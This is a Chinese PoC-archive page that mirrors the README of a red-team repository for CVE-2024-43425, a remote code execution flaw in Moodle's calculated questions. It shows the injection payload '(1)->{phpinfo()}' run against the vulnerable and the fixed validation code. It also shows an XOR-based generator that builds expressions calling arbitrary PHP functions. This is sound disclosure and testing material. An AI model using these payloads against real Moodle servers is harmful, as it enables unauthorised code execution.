POC详情: 8fdf20f80e8f63b7c499e8209ea7ac7da3b37241

来源
https://github.com/RedTeamPentesting/moodle-rce-calculatedquestions
关联漏洞
标题: Moodle 安全漏洞 (CVE-2024-43425)
描述:Moodle是Moodle开源的一套免费的电子学习软件平台,也称课程管理系统、学习管理系统或虚拟学习环境。 Moodle存在安全漏洞,该漏洞源于需要额外的限制来避免计算问题类型中的远程代码执行风险。
描述
Scripts for Analysis of a RCE in Moodle Calculated Questions (CVE-2024-43425)
介绍
# Scripts to Test Input Validation in Moodle Calculated Questions (CVE-2024-43425)

This repository contains the companion scripts to the blog post [Back to School - Exploiting a Remote Code Execution Vulnerability in Moodle](https://blog.redteam-pentesting.de/2024/moodle-rce/), which describes a remote code execution vulnerability in the Moodle learning platform.

## Test the Validation Logic
The scripts in the `validation` directory can be used to directly test input strings against the validation logic used by Moodle to prevent abuse of a call to PHP `eval()`.

All code snippets were directly adapted from [Moodle's source code](https://github.com/moodle/moodle), using the [4.4.1 release](https://github.com/moodle/moodle/tree/v4.4.1/question/type/calculated) for the vulnerable version and [4.4.2](https://github.com/moodle/moodle/tree/v4.4.2/question/type/calculated) for the fixed version.
The scripts include the relevant parts of the `question/type/calculated/questiontype.php` file.

The `validation.php` file uses the vulnerable validation logic:

```sh
$ php validation.php '(1)->{phpinfo()}'
phpinfo()
PHP Version => 8.3.10
[...]
```

This repository also includes the fixed version of the validation code in `validation-fixed.php`:

```sh
$ php validation-fixed.php '(1)->{phpinfo()}'
error illegalformulasyntax with value: {phpinfo()}
[...]
```

## Generate Function Names

The script `xor-generator.py` can be used to generate expressions based on variable functions, which allow calling arbitrary PHP functions with a single numeric parameter in vulnerable versions of Moodle:

```sh
$ ./xor-generator.py 'PRINTF'
((acos(2) . 0+acos(2)) ^ (2 . 6 . 0 . 0 . 0 . 0) ^ (1 . 0 . 0 . 0 . -8) ^ (0 . -4 . 1 . 8 . 0) ^ (-8 . 3 . 1 . 0 . 0))

$ php -r '((acos(2) . 0+acos(2)) ^ (2 . 6 . 0 . 0 . 0 . 0) ^ (1 . 0 . 0 . 0 . -8) ^ (0 . -4 . 1 . 8 . 0) ^ (-8 . 3 . 1 . 0 . 0))("Test");'
Test
```
文件快照

 [4.0K]  /data/pocs/8fdf20f80e8f63b7c499e8209ea7ac7da3b37241
├── [1.9K]  README.md
├── [4.0K]  validation
│   ├── [ 34K]  LICENSE
│   ├── [6.8K]  validation-fixed.php
│   └── [6.5K]  validation.php
└── [4.0K]  xor-generator
    ├── [1.0K]  LICENSE
    └── [4.6K]  xor-generator.py

2 directories, 6 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。